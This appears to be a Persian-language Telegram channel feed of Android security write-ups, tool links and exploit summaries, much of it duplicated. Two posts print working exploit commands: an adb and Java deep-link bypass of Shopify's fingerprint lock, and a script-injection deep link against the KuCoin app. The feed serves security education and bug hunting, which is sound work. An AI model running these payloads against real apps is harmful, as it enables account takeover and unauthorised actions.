⭕️ در این مقاله محقق امنیتی نحوه آنالیز داینامیک لایبرری Native توسط r2frida و در نهایت اوتومیشن کردن پروسه پچ کردن لایبرری در ران تایم توسط r2pipe را آموزش میدهد.
در این مقاله به صورت داینامیک در ران تایم فانکشن native که مربوط به چک کردن پسورد یک اپ crackMe هست را بایپس میکند.
لینک مقاله
لینک مقاله های مشابه
رفرنس رسمی اسکریپت نویسی توسط r2pipe
#Android #Reverse #r2frida #r2pipe
@Securation
در این مقاله به صورت داینامیک در ران تایم فانکشن native که مربوط به چک کردن پسورد یک اپ crackMe هست را بایپس میکند.
لینک مقاله
لینک مقاله های مشابه
رفرنس رسمی اسکریپت نویسی توسط r2pipe
#Android #Reverse #r2frida #r2pipe
@Securation
⭕️ 3 روش برای بارگذاری داینامیک کد در اندروید
بارگذاری کد داینامیک در اندروید از روشهایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده میکنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader
🔗 Blog Post |
Github
#Android #Malware
@Securation
بارگذاری کد داینامیک در اندروید از روشهایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده میکنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader
🔗 Blog Post |
Github
#Android #Malware
@Securation
⭕️ در این پست محقق امنیتی با توجه به پیاده سازی نا امن Content Provider یک اپ اندرویدی که به صورت Exported پیاده سازی شده و به سایر برنامه ها اجازه میدهد که آنرا فراخوانی نمایند؛ از طریق تعامل با content provider خارج از محیط برنامه توانسته است به محتوای فایل های Shared_Pref که حاوی اطلاعات حساس مانند توکن احراز هویت کاربر است دسترسی پیدا کرده و آنرا هایجک نماید و به Account Takeover منتهی شود.
Link
#Android #RE
@Securation
Link
#Android #RE
@Securation
⭕️ بهرهبرداری از آسیبپذیری CVE-2022-1471، که یک آسیبپذیری Insecure Deserialization در کتابخانه SnakeYaml، برای اندروید هست.
https://www.linkedin.com/posts/kousha-zanjani_config-editor-lab-solution-activity-7190853578729648129-LqQX
https://www.youtube.com/watch?v=1H6EtFAKn-E
#Android
@securation
https://www.linkedin.com/posts/kousha-zanjani_config-editor-lab-solution-activity-7190853578729648129-LqQX
https://www.youtube.com/watch?v=1H6EtFAKn-E
#Android
@securation
Linkedin
The SnakeYAML library is vulnerable to Insecure Deserialization (CVE-2022-1471), potentially enabling Remote Code Execution. |…
The SnakeYAML library is vulnerable to Insecure Deserialization (CVE-2022-1471), potentially enabling Remote Code Execution. In my video, I tackled the "Config Editor" lab from #MobileHackingLab, sharing my experience in Persian. This lab underscores the…
⭕️ تزریق کد در اندروید بدون نیاز به Ptrace
در این بلاگ پست با نحوه تزریق کتابخانه با استفاده از /proc/mem بدون نیاز به ptrace آشنا خواهید شد
این ابزار از پروژه Linux_injector ایده برداری شده و برای استفاده در اندروید port شده است
Blog Post: Link
GitHub: Link
#Android #Ptrace
@securation
در این بلاگ پست با نحوه تزریق کتابخانه با استفاده از /proc/mem بدون نیاز به ptrace آشنا خواهید شد
این ابزار از پروژه Linux_injector ایده برداری شده و برای استفاده در اندروید port شده است
فرآیند تزریق شامل چند مرحله است:
اولین قدم این است که یک فانکشن را برای هایجک انتخاب کنید. همانطور که در پروژه اصلی اجرا شد، malloc یکی از رایج ترین اهداف است. آدرس malloc با خواندن /proc/maps، یافتن آدرس پایه libc و محاسبه آدرس مجازی فعلی malloc با افزودن افست آن به آدرس پایه پیدا میشود.
پس از یافتن آدرس، تابع هدف با شل کد مرحله اول بازنویسی می شود. شل کد وظیفه ایجاد یک Memory Region جدید، همگام سازی Thread ها و در نهایت اجرای شل کد مرحله دوم را بر عهده دارد.
شل کد مرحله دوم می تواند یکی از سه نوع باشد: shellcode loader، shellcode raw-dlopen که از dlopen برای بارگذاری یک کتابخانه مشترک از filesystem استفاده می کند، یا شل کد memfd-dlopen که dlopen را روی فایل memfd با محتویات ارائه شده توسط کاربر فراخوانی می کند.
Blog Post: Link
GitHub: Link
#Android #Ptrace
@securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink
Exploit using ADB:
Exploit using Java Code:
https://hackerone.com/reports/637194
#Android
@Securation
Exploit using ADB:
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'
Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);
https://hackerone.com/reports/637194
#Android
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Securation
در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.
#Android #Malware
@Securation
⭕️ APKscan
ابزاری برای اسکن و یافتن API Keys، Tokens، Credentials، Secrets، Endpoints و....
قابلیت ها:
پیدا کردن Secret ها در سورس برنامه
شناسایی مکان های حساس در سورس کد برنامه
شناسایی و یافتن Endpoint ها و توکن ها
https://github.com/LucasFaudman/apkscan
#Android
@Securation
ابزاری برای اسکن و یافتن API Keys، Tokens، Credentials، Secrets، Endpoints و....
قابلیت ها:
پیدا کردن Secret ها در سورس برنامه
شناسایی مکان های حساس در سورس کد برنامه
شناسایی و یافتن Endpoint ها و توکن ها
https://github.com/LucasFaudman/apkscan
#Android
@Securation
GitHub
GitHub - LucasFaudman/apkscan: Scan for secrets, endpoints, and other sensitive data after decompiling and deobfuscating Android…
Scan for secrets, endpoints, and other sensitive data after decompiling and deobfuscating Android files. (.apk, .xapk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab, .jadx.kts). - LucasFaudma...
⭕️ Android Native code obfuscation using O-LLVM(Control Flow Flattening)
Blog Post | o-llvm binary | o-llvm
#Android
#ollvm
#darvincisec
@Securation
Blog Post | o-llvm binary | o-llvm
#Android
#ollvm
#darvincisec
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Exploiting the EvilVideo vulnerability on Telegram
یک اکسپلویت زیرودی تلگرام برای اندروید کشف شد که امکان ارسال برنامههای مخرب پنهانشده به صورت ویدیو در صفحه چت تلگرام قربانی را فراهم میکند و با ضربه زدن بر روی ویدیو به جای پخش مدیا، فرایند نصب بدافزار آغاز میشود
📎 Blog Post
#Android
@Securation
یک اکسپلویت زیرودی تلگرام برای اندروید کشف شد که امکان ارسال برنامههای مخرب پنهانشده به صورت ویدیو در صفحه چت تلگرام قربانی را فراهم میکند و با ضربه زدن بر روی ویدیو به جای پخش مدیا، فرایند نصب بدافزار آغاز میشود
📎 Blog Post
#Android
@Securation
Media is too big
VIEW IN TELEGRAM
⭕️ RCE on Xiaomi 13 Pro (CVE-2023-26324)
👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell
📎 Slides with PoC: DL-Link
#Android
@Securation
👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell
📎 Slides with PoC: DL-Link
#Android
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Securation
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<script\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</script\>'
📎 BlogPost
@Securation
#Android
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اپلیکیشن اندروید با موبایل.
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
⭕️ Exploiting Deeplink via XSS Lead To ATO in South Korea's biggest mobile chat app
@Securation
#Android #DeepLink #XSS #ATO
رایت اپ One Click Exploit XSS To ATO و نحوه اکسپلویت شدن نرم افزار مسنجر اندرویدی kakaoTalk کره جنوبی که امکان سرقت Access Token و استخراج همه ی گفتگوها را برای هکر فراهم میکند.
باگ موجود برطرف شده است، اما گزارشگر باگ پاداشی دریافت نکرده است، چرا که فقط کره ای ها واجد شرایط دریافت جایزه هستند!!!
📎 BlogPost: Link
@Securation
#Android #DeepLink #XSS #ATO
⭕️ FridaScriptGen
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
❤1
⭕️ Frida Launcher 🚀
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
⭕️ ریکان اندروید برای باگ بانتی!
اگر به دنبال شکار باگ توی اپهای اندرویدی هستید، اولین قدم شناسایی دقیق اپ و کشف نقاط ضعفشه. توی این مسیر باید بلد باشید چطور:
⦁ کدها و منابع رو دیکامپایل کنی (APKTool و jadx-gui کمکت میکنند)
⦁ آدرسهای مخفی و endpointها رو پیدا کنی (apk2url)
⦁ کلیدها و secrets های هاردکد شده رو کشف کنی
⦁ از ابزارهای اتومیت مثل MobSF برای آنالیز امنیتی استفاده کنی
⦁ با Drozer تست runtime انجام بدی و باگهای permission و... رو بگیری
این تکنیکها و جزییاتش رو میتونید در بلاگ پست زیر مطالعه کنید
📎 Blog: Link
@Securation
#Android #Recon #RE
اگر به دنبال شکار باگ توی اپهای اندرویدی هستید، اولین قدم شناسایی دقیق اپ و کشف نقاط ضعفشه. توی این مسیر باید بلد باشید چطور:
⦁ کدها و منابع رو دیکامپایل کنی (APKTool و jadx-gui کمکت میکنند)
⦁ آدرسهای مخفی و endpointها رو پیدا کنی (apk2url)
⦁ کلیدها و secrets های هاردکد شده رو کشف کنی
⦁ از ابزارهای اتومیت مثل MobSF برای آنالیز امنیتی استفاده کنی
⦁ با Drozer تست runtime انجام بدی و باگهای permission و... رو بگیری
این تکنیکها و جزییاتش رو میتونید در بلاگ پست زیر مطالعه کنید
📎 Blog: Link
@Securation
#Android #Recon #RE
❤13👍5👎1